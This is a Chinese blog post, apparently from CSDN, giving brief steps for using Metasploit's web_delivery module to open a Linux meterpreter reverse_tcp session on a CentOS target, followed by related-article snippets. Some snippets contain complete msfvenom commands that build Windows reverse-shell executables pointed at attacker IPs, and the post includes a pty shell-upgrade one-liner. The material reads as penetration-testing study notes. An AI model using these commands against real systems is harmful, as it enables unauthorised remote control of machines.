(记录向)使用MSF的web_delivery模块上线

最新推荐文章于 2024-05-28 23:28:58 发布
最新推荐文章于 2024-05-28 23:28:58 发布
阅读量1.4k 收藏 2
点赞数 2
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/110389788
版权

前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。

目标环境:

Centos6.5

1、选择exploit/multi/script/web_delivery模块

2、选择目标系统,我这里选择Linux

3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp 

4、本机监听一下

5、运行,生成一条命令

6、目标机器执行上线。

7、获取一个友好的交互界面。  python -c 'import pty;pty.spawn("/bin/bash")'

 

 

daxi0ng
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WMI远程命令执行上线msf
SheXinK’s Blog
11-09 1598
WMI命令执行与Certutil.exe上线msf1 测试环境2 Certutil.exe下载2.1 生成Payload2.2 搭建下载环境2.3 下载Payload方法一:powershell下载方法二:certutil.exe下载3 上线msf3.1 Kali运行监听3.2 远程执行Payload 1 测试环境 攻击机Kali:192.168.11.131 靶机Server2008:192.1...
MSF上线到提权
m0_53087192的博客
01-07 1065
环境 攻击机:kali ip:192.168.232.129 被攻击机:win7 ip:192.168.232.140 MSF木马生成 windows_x86_payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe windows_x64_payload msfvenom -p windows/x64/meterpreter/reverse_tcp
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2511
一条命令上线MSF(Metasploit)-web_delivery模块
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 919
免责声明:本文仅做技术交流与学习...
MSF上线
weixin_51151498的博客
03-16 1088
MSF上线
metasploit之webdelivery
Yale的博客
01-31 1253
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
msf5 自动攻击模块 db_autopwn
07-10
**msf5 自动攻击模块 db_autopwn 知识点详解** `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演...
MSF Toolkit_zip_
10-03
【标题】"MSF Toolkit_zip_" 指的是Metasploit Framework的一个工具包,它被压缩成ZIP格式以便于分发和使用。Metasploit Framework(简称MSF)是一个广泛使用的开源安全测试平台,用于执行渗透测试和漏洞评估。这个...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
通过安装和使用这个播放器,用户不仅可以收看实时的电视节目,还可以播放预先录制的MFS文件,从而丰富了移动娱乐体验。尽管随着技术的发展,现在有更多的选择来接收和播放移动电视,但创毅视讯的这款软件在当时是一...
msfweb:一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用
02-18
:syringe: msfWeb :spider_web: 一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用 该项目的目的是在参与过程中快速使用metasploit,而无需ssh或完整的工作站。 以这种方式使用框架具有一些优势 易于部署 可通过任何Web客户端(移动,智能电视等)访问 本机代理支持/绕过防火墙 成分 Metasploit-用于开发,测试和执行漏洞利用的软件平台-https: https://github.com/rapid7/metasploit-framework.git GoTTY-通过浏览器共享您的终端https://github.com/yudai/gotty 用法 拉容器图像 docker pull 0daysimpson/msfweb 运行容器 docker run -d -p 8080:8080 0daysimpson/msfweb 访问网络应用 http
Msf - web_delivery
Nixawk
02-22 1844
Python Payload Modemsf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- --------
msf中exploit的web_delivery模块
weixin_30300523的博客
03-11 284
背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码至内存执行 错误尝试:远端服务器开启web服务,让目标设备来调取。(错误点:默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行) ...
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。
随心所欲不逾矩
02-27 810
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1484
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#网络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
msf端口转发上线
m0_53087192的博客
01-14 688
环境 攻击机:kali ip192.168.50.232 被攻击机:win7 开通转发隧道 注册地址:http://www.ngrok.cc msf木马生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=64.69.43.xx LPORT=10151 -f exe > reverse.exe IP地址为中转服务器ip,端口为中专服务器端口,如下图。 开启转发并设置监听 在网站下载linux客户端,开启转发。 ./sunny clientid
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1310
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
msf mysql_login
最新发布
06-27
当你在 Msf使用 `mysql_login` 模块时,通常会执行以下步骤: 1. **扫描目标**:首先扫描目标系统或服务寻找可能存在的 MySQL 登录凭证漏洞,例如弱密码、默认配置等。 2. **利用漏洞**:如果找到可利用的漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值